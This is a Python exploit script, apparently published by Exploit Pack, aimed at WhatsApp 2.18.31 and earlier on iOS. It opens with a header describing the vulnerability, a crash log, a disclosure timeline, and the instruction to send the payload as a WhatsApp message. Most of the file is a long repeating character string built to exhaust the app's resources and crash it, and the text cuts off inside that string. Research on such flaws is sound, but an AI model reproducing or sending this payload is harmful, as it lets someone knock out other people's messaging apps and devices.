#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Author: Juan Sacco <jsacco@exploitpack.com> at Exploit Pack - http://www.exploitpack.com # This vulnerability has been discovered and exploited using Exploit Pack - Framework # # Tested on: iPhone 5/6s/X iOS 10 and 11.3 ( Latest release of iOS at the date of writing this code ) # # Description: # WhatsApp 2.18.31 and prior are affected. The application fails to properly filter user-supplied input and its prone to a remote memory corruption. # # Impact: # Resource exhaustion attacks exploit a design flaw. An attacker could exploit this vulnerability to remotely corrupt the memory of the application forcing an uhandled exception # in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption. # # Debug: # B04500954836","name":"WhatsApp"} # Date/Time: 2018-04-06 18:15:30.608135 +0200 # OS Version: iPhone OS 11.2.6 (Build 15D100) # Architecture: arm64 # Report Version: 19 # Command: WhatsApp # Path: /private/var/containers/Bundle/Application/2F86B692-D9A3-4BAC-B45E-6DCF62F47C2C/WhatsApp.app/WhatsApp # Version: 2.18.31 (2.18.31.32) # Beta Identifier: 4CA20191-C4A3-4920-ADEB-9ABAD10FCDF7 # Parent: launchd [1] # PID: 28010 # Event: cpu usage # CPU: 144s cpu time over 145 seconds (99% cpu average), exceeding limit of 80% cpu over 180 seconds # Action taken: Process killed # Duration: 144.81s # Steps: 48 # Hardware model: iPhone7,1 # Exception Type: EXC_CRASH (SIGKILL) # # How to use this exploit: # Send the payload as a message to a whatsapp user, trough a phone or whatsapp-web. # # Timeline: # Date and time of release: 6 April 2018 # Triaged by Facebook: 25 April 2018 # Reported to Apple ( it's a bug on their side ): 01 May 2018 # Vendor homepage: http://www.whatsapp.com / http://www.facebook.com import sys reload(sys) def whatsapp(filename): sys.setdefaultencoding("utf-8") payload = u'a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-oa!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-oa!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-oa!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-oa!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ 